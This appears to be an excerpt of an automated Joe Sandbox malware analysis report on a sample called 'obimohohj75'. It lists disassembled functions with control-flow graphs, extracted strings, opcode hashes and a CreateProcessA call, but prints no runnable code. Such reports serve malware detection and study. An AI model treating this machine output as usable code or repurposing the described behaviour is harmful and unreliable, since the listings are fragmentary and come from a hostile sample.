                                                          control_flow_graph 1247 1dd280-1dd2b1 1248 1dd2b8-1dd2dd 1247->1248 1249 1dd2b3 1247->1249 1250 1dd2df 1248->1250 1251 1dd2e4-1dd2f0 1248->1251 1249->1248 1250->1251 1252 1dd2f3 1251->1252 1253 1dd2fa-1dd316 1252->1253 1254 1dd31f-1dd320 1253->1254 1255 1dd318 1253->1255 1263 1dd492-1dd496 1254->1263 1255->1252 1255->1254 1256 1dd41e-1dd428 1255->1256 1257 1dd348-1dd34c 1255->1257 1258 1dd398-1dd3ad 1255->1258 1259 1dd325-1dd32b 1255->1259 1260 1dd375-1dd393 1255->1260 1261 1dd476-1dd48d 1255->1261 1262 1dd453-1dd456 1255->1262 1255->1263 1264 1dd402-1dd419 1255->1264 1265 1dd3b2-1dd3b9 1255->1265 1266 1dd42f-1dd44e 1256->1266 1267 1dd42a 1256->1267 1268 1dd35f-1dd366 1257->1268 1269 1dd34e-1dd35d 1257->1269 1258->1253 1276 1dd32e call 1dd6f0 1259->1276 1277 1dd32e call 1dd700 1259->1277 1260->1253 1261->1253 1278 1dd459 call 1dd4d8 1262->1278 1279 1dd459 call 1dd4c8 1262->1279 1264->1253 1270 1dd3bb 1265->1270 1271 1dd3c0-1dd3fd 1265->1271 1266->1253 1267->1266 1273 1dd36d-1dd373 1268->1273 1269->1273 1270->1271 1271->1253 1272 1dd334-1dd346 1272->1253 1273->1253 1274 1dd45f-1dd471 1274->1253 1276->1272 1277->1272 1278->1274 1279->1274
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 7Z/t$RWIK$[[bb
                                                          • API String ID: 0-1157992699
                                                          • Opcode ID: fedd3f6b845af5df849eb85bc1fd5495c8c59960841ee808711c614459603264
                                                          • Instruction ID: ed4a836610eea4ff5f38b42101ca33a0374c34d3238f357e13dae0f628cbf266
                                                          • Opcode Fuzzy Hash: fedd3f6b845af5df849eb85bc1fd5495c8c59960841ee808711c614459603264
                                                          • Instruction Fuzzy Hash: B66126B4E0564A8FCB08CFAAD4505AEFFF2EF89300F24D46AD419A7255D7348A42CF94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002E36F0 Relevance: 1.7, Strings: 1, Instructions: 463COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: <g#
                                                          • API String ID: 0-1525369332
                                                          • Opcode ID: 2a1c7f062223f768c90ee86af5b44c9e60985a11cd1360d03c57caa3b92b28f3
                                                          • Instruction ID: 0f0e3283c59c934bfd57e5e703419cee19a5ede830726c8924c5ce9bccdfbc00
                                                          • Opcode Fuzzy Hash: 2a1c7f062223f768c90ee86af5b44c9e60985a11cd1360d03c57caa3b92b28f3
                                                          • Instruction Fuzzy Hash: 2B023471A28285DFCB04CF69C8586ADBBF1FF89301F64846BE48597292D374CA92CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001DEBA8 Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: tIh
                                                          • API String ID: 0-443931868
                                                          • Opcode ID: 7606b126b2392bca00c4b376ce1e3638517d705d699e8b4129efdafc7b60b55e
                                                          • Instruction ID: 799310868325f68b150ab3f9850cc5c2bfac7c2ac85f42b3df21b63c63fabd48
                                                          • Opcode Fuzzy Hash: 7606b126b2392bca00c4b376ce1e3638517d705d699e8b4129efdafc7b60b55e
                                                          • Instruction Fuzzy Hash: 7DD11870D1420ADFCB08DFA9D4848AEFBB2FF89301B219556D516AB315D734EA82CF94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002E1D41 Relevance: 1.5, Strings: 1, Instructions: 235COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: p .
                                                          • API String ID: 0-3806500911
                                                          • Opcode ID: e2f21b1cd6944978a1550a1c1fc6cb59e3bba2ece7872bc860c16a47c479f97a
                                                          • Instruction ID: a047152104daf7d2841fb36cee160d0f1de05dac4f8da30c2a401bfeedf48812
                                                          • Opcode Fuzzy Hash: e2f21b1cd6944978a1550a1c1fc6cb59e3bba2ece7872bc860c16a47c479f97a
                                                          • Instruction Fuzzy Hash: A0A15970E25248DFCB08CFA6E58499DFBB2FF89300F64A42AE416B7264D7709925CF14
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002E1A38 Relevance: .2, Instructions: 204COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 57957c66792f01bfcf2ca5af1eda04b4b7ee56318f5a058031fc6772d8ecafe7
                                                          • Instruction ID: 8bd628093e91fd15f0b2d5b7999e04919d620802817baabe4600700137dad354
                                                          • Opcode Fuzzy Hash: 57957c66792f01bfcf2ca5af1eda04b4b7ee56318f5a058031fc6772d8ecafe7
                                                          • Instruction Fuzzy Hash: 37810374E5525ACFCB04CFAAD9809EEFBB2FB88300F60996AD401A7354D3749962CF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002E1A28 Relevance: .2, Instructions: 203COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: faf8e78971bcc73c083b68ee49f56de90289d49129887de6ca1352ab91dc9fcf
                                                          • Instruction ID: 8692599309619fa973362ad57eaed89430299a11b6a8291137650bfe3efb197d
                                                          • Opcode Fuzzy Hash: faf8e78971bcc73c083b68ee49f56de90289d49129887de6ca1352ab91dc9fcf
                                                          • Instruction Fuzzy Hash: BF811474E5525ACFCB04CFAAD9809EEFBB2FB88300F50996AD401A7358D3749962CF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001DD756 Relevance: .2, Instructions: 172COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 13a9e75dd2c3ead3773c22b3002398952b5e7c88fd4351c83ed79caee1425ebb
                                                          • Instruction ID: e11a2cd9cf157f2f41819cc406f218118f2e6a4c80ba3e615de3621273fbe838
                                                          • Opcode Fuzzy Hash: 13a9e75dd2c3ead3773c22b3002398952b5e7c88fd4351c83ed79caee1425ebb
                                                          • Instruction Fuzzy Hash: C07125B5E0120ADFCB08CFD9E4819AEFBB2FB88314F21946AD415AB354C7349A41CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001DDCE9 Relevance: .1, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 102aaa33e3c1b2ed6322d1a1d59746b3a5059b800b189867bf19a4a379324392
                                                          • Instruction ID: 0da6c9ac3ba98eb583088a8efc6f1c3c57fd02ba24d7eed90a0f1e39d74324ff
                                                          • Opcode Fuzzy Hash: 102aaa33e3c1b2ed6322d1a1d59746b3a5059b800b189867bf19a4a379324392
                                                          • Instruction Fuzzy Hash: 1C21EBB1E056588BEB18CFABD8542DEFBF3AFC9310F14C16AD409AA264DB340A55CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001D98C0 Relevance: 31.8, Strings: 25, Instructions: 581COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fp$ fp$ fp$ fp$ fp$ fp$ fp$Tep$Tep$Tep$XXp$XXp$XXp$XXp$XXp$XXp$XXp$$p$$p$$p$$p$$p$$p$b$$h#
                                                          • API String ID: 0-514228862
                                                          • Opcode ID: 9af73b8498a2e5037a685cc115b2e4f034ab21065a69a1386a56cc2fb88330f3
                                                          • Instruction ID: 5bc04e4936319881c04ceda61f0d993bf86b9c97e858f3179251f554a8b56825
                                                          • Opcode Fuzzy Hash: 9af73b8498a2e5037a685cc115b2e4f034ab21065a69a1386a56cc2fb88330f3
                                                          • Instruction Fuzzy Hash: C922AE30B04258DFDB18DBA8C855BADBBB2BF85300F698567E406AB399CB70DC41DB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001D851F Relevance: 16.8, Strings: 13, Instructions: 562COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Tep$Tep$Tep$Tep$Tep$Tep$Tep$$p$$p$$p$$p$h#$h#
                                                          • API String ID: 0-1874645747
                                                          • Opcode ID: 8da457b29321d6e092b539b85e74c8c86d774a05cb33805df8e9457da2dfbab4
                                                          • Instruction ID: 2e0576c058865d109d01e77526ebdf9b0e01dc3b256b9312514c1360cc11ed37
                                                          • Opcode Fuzzy Hash: 8da457b29321d6e092b539b85e74c8c86d774a05cb33805df8e9457da2dfbab4
                                                          • Instruction Fuzzy Hash: 0322C330B04254DFDB099B68D859BAEBBB2AF88301F25846BE806DB3D5CF749C41DB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001D9D7C Relevance: 11.5, Strings: 9, Instructions: 214COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 466 1d9d7c 467 1d9d7d-1d9d81 466->467 468 1d9da4 467->468 469 1d9d83-1d9d8c 467->469 472 1d9da7-1d9da9 468->472 470 1d9d8e-1d9d91 469->470 471 1d9d93-1d9da0 469->471 473 1d9da2 470->473 471->473 474 1d9dab-1d9db1 472->474 475 1d9dc1-1d9e0f call 1daff9 472->475 473->472 477 1d9db5-1d9dbf 474->477 478 1d9db3 474->478 484 1d9e15-1d9e1d 475->484 477->475 478->475 485 1d9d68-1d9d6b 484->485 485->467 486 1d9d6d 485->486 486->467 487 1d9f5d-1d9f65 486->487 488 1da05c-1da060 486->488 489 1d9e8c-1d9ebb 486->489 490 1da08e-1da097 486->490 491 1d9f6a-1d9f7d 486->491 492 1d9fa6-1d9faa 486->492 493 1d9ec0-1d9ed3 486->493 494 1d9f90-1d9f97 486->494 495 1d9ee0-1d9ef3 486->495 496 1da022-1da04c 486->496 497 1d9e22-1d9e35 486->497 498 1da081 488->498 499 1da062-1da06b 488->499 489->485 524 1d9f7f 491->524 525 1d9f89-1d9f8e 491->525 502 1d9fcd 492->502 503 1d9fac-1d9fb5 492->503 501 1da09a-1da0a6 493->501 516 1d9ed9-1d9edd 493->516 500 1d9f9d-1d9fa1 494->500 494->501 520 1d9f09 495->520 521 1d9ef5-1d9f07 495->521 550 1da04e 496->550 551 1da055-1da05a 496->551 522 1d9e58 497->522 523 1d9e37-1d9e40 497->523 513 1da084-1da08b 498->513 507 1da06d-1da070 499->507 508 1da072-1da075 499->508 504 1d9fd0-1d9fd7 502->504 511 1d9fbc-1d9fc9 503->511 512 1d9fb7-1d9fba 503->512 518 1d9fed 504->518 519 1d9fd9-1d9feb 504->519 526 1da07f 507->526 508->526 527 1d9fcb 511->527 512->527 516->495 528 1d9ff0-1d9ffd 518->528 519->528 529 1d9f0c-1d9f10 520->529 521->529 533 1d9e5b-1d9e87 522->533 530 1d9e47-1d9e54 523->530 531 1d9e42-1d9e45 523->531 534 1d9f84 524->534 525->534 526->513 527->504 547 1d9fff-1da005 528->547 548 1da015-1da01d 528->548 537 1d9f31 529->537 538 1d9f12-1d9f1b 529->538 539 1d9e56 530->539 531->539 543 1d9f34-1d9f49 537->543 541 1d9f1d-1d9f20 538->541 542 1d9f22-1d9f25 538->542 539->533 549 1d9f2f 541->549 542->549 543->501 557 1d9f4f-1d9f58 543->557 552 1da009-1da00b 547->552 553 1da007 547->553 549->543 555 1da050 550->555 551->555 552->548 553->548
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fp$ fp$Tep$XXp$XXp$$p$$p$$p$$p
                                                          • API String ID: 0-3426324077
                                                          • Opcode ID: 5cedbe83a67b328a51e2c281625f265f77390cfca6b0e9ee08f01ddc2d3af053
                                                          • Instruction ID: a276bbb0eab3417e98c85e7c4d5e2e1b6c9e0c4815500d9df905a8fc5d7c258a
                                                          • Opcode Fuzzy Hash: 5cedbe83a67b328a51e2c281625f265f77390cfca6b0e9ee08f01ddc2d3af053
                                                          • Instruction Fuzzy Hash: D4818D30A04258DFDB28CBE8D445BADBBB2FF85301F6A8567E412AB395CB709C41DB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001D1903 Relevance: 10.2, Strings: 8, Instructions: 204COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 559 1d1903 560 1d1908-1d190b 559->560 561 1d191d-1d1949 560->561 562 1d190d 560->562 601 1d194b-1d1953 561->601 602 1d1961-1d1986 561->602 562->561 563 1d1b2c-1d1b42 562->563 564 1d1c2e-1d1c42 562->564 565 1d1a2b-1d1a75 562->565 566 1d199b-1d1a1c 562->566 567 1d1a7a-1d1abe 562->567 568 1d1c45-1d1c81 562->568 569 1d1a24-1d1a26 562->569 570 1d1b47-1d1b9e 562->570 571 1d1b06-1d1b20 562->571 572 1d1bc3-1d1c0f 562->572 573 1d1ae2-1d1b01 562->573 563->560 566->569 619 1d1acc-1d1add 567->619 620 1d1ac0-1d1ac8 567->620 569->560 623 1d1bb6-1d1bbe 570->623 624 1d1ba0-1d1ba8 570->624 571->560 572->560 573->560 601->602 622 1d198e-1d1996 602->622 620->619 622->560 624->623
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fp$ fp$Tep$XXp$$p$$p$$p$$p
                                                          • API String ID: 0-3004817860
                                                          • Opcode ID: 0537fc9c7a9f778716ffaa4ee82f0f287fc49c4f8ccdf9da2ebc1ce80b8fbe76
                                                          • Instruction ID: 512035cec50d749b66645fe6a497072e1bf34ae2fe0beca9cf6199de66efd77e
                                                          • Opcode Fuzzy Hash: 0537fc9c7a9f778716ffaa4ee82f0f287fc49c4f8ccdf9da2ebc1ce80b8fbe76
                                                          • Instruction Fuzzy Hash: AC817930A04258FFDB18CB94D4A5BACB7B2BF80315F6A8067E852AB395D7709C81DB41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001D9D63 Relevance: 10.2, Strings: 8, Instructions: 197COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 631 1d9d63 632 1d9d68-1d9d6b 631->632 633 1d9d7d-1d9d81 632->633 634 1d9d6d 632->634 646 1d9da4 633->646 647 1d9d83-1d9d8c 633->647 634->633 635 1d9f5d-1d9f65 634->635 636 1da05c-1da060 634->636 637 1d9e8c-1d9ebb 634->637 638 1da08e-1da097 634->638 639 1d9f6a-1d9f7d 634->639 640 1d9fa6-1d9faa 634->640 641 1d9ec0-1d9ed3 634->641 642 1d9f90-1d9f97 634->642 643 1d9ee0-1d9ef3 634->643 644 1da022-1da04c 634->644 645 1d9e22-1d9e35 634->645 650 1da081 636->650 651 1da062-1da06b 636->651 637->632 680 1d9f7f 639->680 681 1d9f89-1d9f8e 639->681 655 1d9fcd 640->655 656 1d9fac-1d9fb5 640->656 653 1da09a-1da0a6 641->653 672 1d9ed9-1d9edd 641->672 652 1d9f9d-1d9fa1 642->652 642->653 676 1d9f09 643->676 677 1d9ef5-1d9f07 643->677 712 1da04e 644->712 713 1da055-1da05a 644->713 678 1d9e58 645->678 679 1d9e37-1d9e40 645->679 654 1d9da7-1d9da9 646->654 648 1d9d8e-1d9d91 647->648 649 1d9d93-1d9da0 647->649 662 1d9da2 648->662 649->662 670 1da084-1da08b 650->670 663 1da06d-1da070 651->663 664 1da072-1da075 651->664 666 1d9dab-1d9db1 654->666 667 1d9dc1-1d9e0f call 1daff9 654->667 657 1d9fd0-1d9fd7 655->657 668 1d9fbc-1d9fc9 656->668 669 1d9fb7-1d9fba 656->669 674 1d9fed 657->674 675 1d9fd9-1d9feb 657->675 662->654 683 1da07f 663->683 664->683 684 1d9db5-1d9dbf 666->684 685 1d9db3 666->685 722 1d9e15-1d9e1d 667->722 686 1d9fcb 668->686 669->686 672->643 688 1d9ff0-1d9ffd 674->688 675->688 689 1d9f0c-1d9f10 676->689 677->689 693 1d9e5b-1d9e87 678->693 690 1d9e47-1d9e54 679->690 691 1d9e42-1d9e45 679->691 694 1d9f84 680->694 681->694 683->670 684->667 685->667 686->657 709 1d9fff-1da005 688->709 710 1da015-1da01d 688->710 697 1d9f31 689->697 698 1d9f12-1d9f1b 689->698 699 1d9e56 690->699 691->699 705 1d9f34-1d9f49 697->705 703 1d9f1d-1d9f20 698->703 704 1d9f22-1d9f25 698->704 699->693 711 1d9f2f 703->711 704->711 705->653 721 1d9f4f-1d9f58 705->721 715 1da009-1da00b 709->715 716 1da007 709->716 711->705 718 1da050 712->718 713->718 715->710 716->710 722->632
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fp$ fp$Tep$XXp$$p$$p$$p$$p
                                                          • API String ID: 0-3004817860
                                                          • Opcode ID: d1c20d6d80a80f60646461bb09927fa8f15ec972677bcb322f3da820a049769b
                                                          • Instruction ID: e6c5aefc20b4c6d3a30a6542b4c38e3991fadcaed7c78d405c5feaa68f51462e
                                                          • Opcode Fuzzy Hash: d1c20d6d80a80f60646461bb09927fa8f15ec972677bcb322f3da820a049769b
                                                          • Instruction Fuzzy Hash: CF717D30B04258DFDB28CBA8D445BADBBB2FF85301F6A8567E412AB395CB709C41DB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002ECD38 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 244processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 724 2ecd38-2ecdd1 726 2ece1a-2ece42 724->726 727 2ecdd3-2ecdea 724->727 730 2ece88-2ecede 726->730 731 2ece44-2ece58 726->731 727->726 732 2ecdec-2ecdf1 727->732 739 2ecf24-2ed01b CreateProcessA 730->739 740 2ecee0-2ecef4 730->740 731->730 741 2ece5a-2ece5f 731->741 733 2ece14-2ece17 732->733 734 2ecdf3-2ecdfd 732->734 733->726 736 2ecdff 734->736 737 2ece01-2ece10 734->737 736->737 737->737 742 2ece12 737->742 760 2ed01d-2ed023 739->760 761 2ed024-2ed06b 739->761 740->739 749 2ecef6-2ecefb 740->749 743 2ece82-2ece85 741->743 744 2ece61-2ece6b 741->744 742->733 743->730 746 2ece6f-2ece7e 744->746 747 2ece6d 744->747 746->746 750 2ece80 746->750 747->746 751 2ecf1e-2ecf21 749->751 752 2ecefd-2ecf07 749->752 750->743 751->739 754 2ecf0b-2ecf1a 752->754 755 2ecf09 752->755 754->754 756 2ecf1c 754->756 755->754 756->751 760->761
                                                          APIs
                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002ECFFF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID: W KF$W KF
                                                          • API String ID: 963392458-1084561633
                                                          • Opcode ID: 9f32ae2274baa417a49445e80a42b1082fd108017a8ce05b24e4f0f4f7ca62b4
                                                          • Instruction ID: 14634b129247994fa9a0e0046613cba4ba639588b821b6c100aa98dedadb01e4
                                                          • Opcode Fuzzy Hash: 9f32ae2274baa417a49445e80a42b1082fd108017a8ce05b24e4f0f4f7ca62b4
                                                          • Instruction Fuzzy Hash: 9CA13671D102598FCF24CFA9C841BEEBBF2BB09310F1491A9E859B7240D7749A96CF94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001D8CA8 Relevance: 5.2, Strings: 4, Instructions: 210COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 765 1d8ca8-1d8cc7 766 1d8ccc-1d8ccf 765->766 767 1d8cd8-1d8cdd 766->767 768 1d8cd1 766->768 767->766 768->767 769 1d8cfc-1d8d01 768->769 770 1d8cdf-1d8cec 768->770 771 1d8d39-1d8d40 768->771 772 1d8d0a-1d8d15 768->772 773 1d8d25-1d8d2c 768->773 774 1d8d03 768->774 769->766 775 1d8cee 770->775 776 1d8cf5-1d8cfa 770->776 777 1d8d17-1d8d23 772->777 778 1d8d43-1d8dec 772->778 773->778 779 1d8d2e-1d8d37 773->779 774->772 780 1d8cf3 775->780 776->769 776->780 777->766 787 1d8e9a-1d8ecd 778->787 788 1d8df2-1d8dff 778->788 779->766 780->766 792 1d8f03-1d8f51 787->792 788->787 789 1d8e05-1d8e12 788->789 789->787 791 1d8e18-1d8e25 789->791 791->787 793 1d8e27-1d8e34 791->793 804 1d8f88-1d8f8e 792->804 805 1d8f53-1d8f5f 792->805 793->787 794 1d8e36-1d8e43 793->794 794->787 796 1d8e45-1d8e52 794->796 796->787 797 1d8e54-1d8e61 796->797 797->787 798 1d8e63-1d8e99 call 1d7f58 797->798 807 1d8ecf-1d8ed2 805->807 810 1d8edb-1d8eef 807->810 811 1d8ed4 807->811 810->804 816 1d8ef5-1d8f01 810->816 811->792 811->810 813 1d8f64-1d8f70 811->813 814 1d8f73-1d8f87 811->814 813->814 816->807
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8p$8p$8p$lb#
                                                          • API String ID: 0-5103522
                                                          • Opcode ID: 500c7192933dafdc12b51c6bb9d7970b00855078ae617ac2cf1189f1bcaa2879
                                                          • Instruction ID: c44364d184ef8e966b413d61461f7dc8496a28cb8b82640f4632ded39bcd15ec
                                                          • Opcode Fuzzy Hash: 500c7192933dafdc12b51c6bb9d7970b00855078ae617ac2cf1189f1bcaa2879
                                                          • Instruction Fuzzy Hash: 4681E030A15258DFC704EFA8D858AAEBBF1EF45300F0585A7D4059B3A2DB74DA49CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001D8832 Relevance: 4.0, Strings: 3, Instructions: 232COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 870 1d8832-1d8839 871 1d883b-1d8850 870->871 872 1d8830 870->872 874 1d8855-1d8858 871->874 872->871 875 1d885a 874->875 876 1d8861-1d8865 874->876 875->876 877 1d8bed-1d8bf4 875->877 878 1d88cf 875->878 879 1d8a9f-1d8ac9 875->879 880 1d88e9-1d88ed 875->880 881 1d8898-1d889c 875->881 882 1d8af5-1d8b93 875->882 883 1d8ad4-1d8ade 875->883 884 1d89e7-1d8a69 875->884 885 1d8ba6-1d8bcf call 2e4640 875->885 886 1d8867-1d8870 876->886 887 1d8886 876->887 878->880 1018 1d8acb call 2e3858 879->1018 1019 1d8acb call 2e3940 879->1019 1020 1d8acb call 2e3950 879->1020 889 1d88ef-1d88f8 880->889 890 1d8910 880->890 893 1d88bf 881->893 894 1d889e-1d88a7 881->894 892 1d8bf7-1d8cc7 882->892 987 1d8b95-1d8ba1 882->987 891 1d8ae4-1d8af0 883->891 883->892 968 1d8a6b-1d8a71 884->968 969 1d8a81-1d8a8b 884->969 954 1d8bd6-1d8bdd 885->954 895 1d8877-1d887a 886->895 896 1d8872-1d8875 886->896 888 1d8889-1d888b 887->888 904 1d888d 888->904 905 1d8891-1d8896 888->905 898 1d88ff-1d890c 889->898 899 1d88fa-1d88fd 889->899 902 1d8913-1d891d 890->902 925 1d8ccc-1d8ccf 892->925 908 1d88c2-1d88cd 893->908 906 1d88ae-1d88bb 894->906 907 1d88a9-1d88ac 894->907 903 1d8884 895->903 896->903 910 1d890e 898->910 899->910 920 1d8928-1d892f 902->920 903->888 912 1d888f 904->912 905->912 913 1d88bd 906->913 907->913 908->874 910->902 912->874 913->908 923 1d8931-1d893a 920->923 924 1d8952 920->924 930 1d893c-1d893f 923->930 931 1d8941-1d894e 923->931 934 1d8955-1d89c2 924->934 932 1d8cd8-1d8cdd 925->932 933 1d8cd1 925->933 935 1d8950 930->935 931->935 932->925 933->932 936 1d8cfc-1d8d01 933->936 937 1d8cdf-1d8cec 933->937 938 1d8d39-1d8d40 933->938 939 1d8d0a-1d8d15 933->939 940 1d8d25-1d8d2c 933->940 941 1d8d03 933->941 979 1d89da-1d89e2 934->979 980 1d89c4-1d89ca 934->980 935->934 936->925 946 1d8cee 937->946 947 1d8cf5-1d8cfa 937->947 950 1d8d17-1d8d23 939->950 951 1d8d43-1d8dec 939->951 940->951 952 1d8d2e-1d8d37 940->952 941->939 942 1d8ad1 942->883 953 1d8cf3 946->953 947->936 947->953 950->925 985 1d8e9a-1d8ecd 951->985 986 1d8df2-1d8dff 951->986 952->925 953->925 954->892 959 1d8bdf-1d8be8 954->959 973 1d8a75-1d8a77 968->973 974 1d8a73 968->974 969->892 975 1d8a91-1d8a9a 969->975 973->969 974->969 981 1d89cc 980->981 982 1d89ce-1d89d0 980->982 981->979 982->979 991 1d8f03-1d8f51 985->991 986->985 988 1d8e05-1d8e12 986->988 988->985 990 1d8e18-1d8e25 988->990 990->985 992 1d8e27-1d8e34 990->992 1003 1d8f88-1d8f8e 991->1003 1004 1d8f53-1d8f5f 991->1004 992->985 993 1d8e36-1d8e43 992->993 993->985 995 1d8e45-1d8e52 993->995 995->985 996 1d8e54-1d8e61 995->996 996->985 997 1d8e63-1d8e99 call 1d7f58 996->997 1006 1d8ecf-1d8ed2 1004->1006 1009 1d8edb-1d8eef 1006->1009 1010 1d8ed4 1006->1010 1009->1003 1016 1d8ef5-1d8f01 1009->1016 1010->991 1010->1009 1012 1d8f64-1d8f70 1010->1012 1013 1d8f73-1d8f87 1010->1013 1012->1013 1016->1006 1018->942 1019->942 1020->942
                                                          Strings
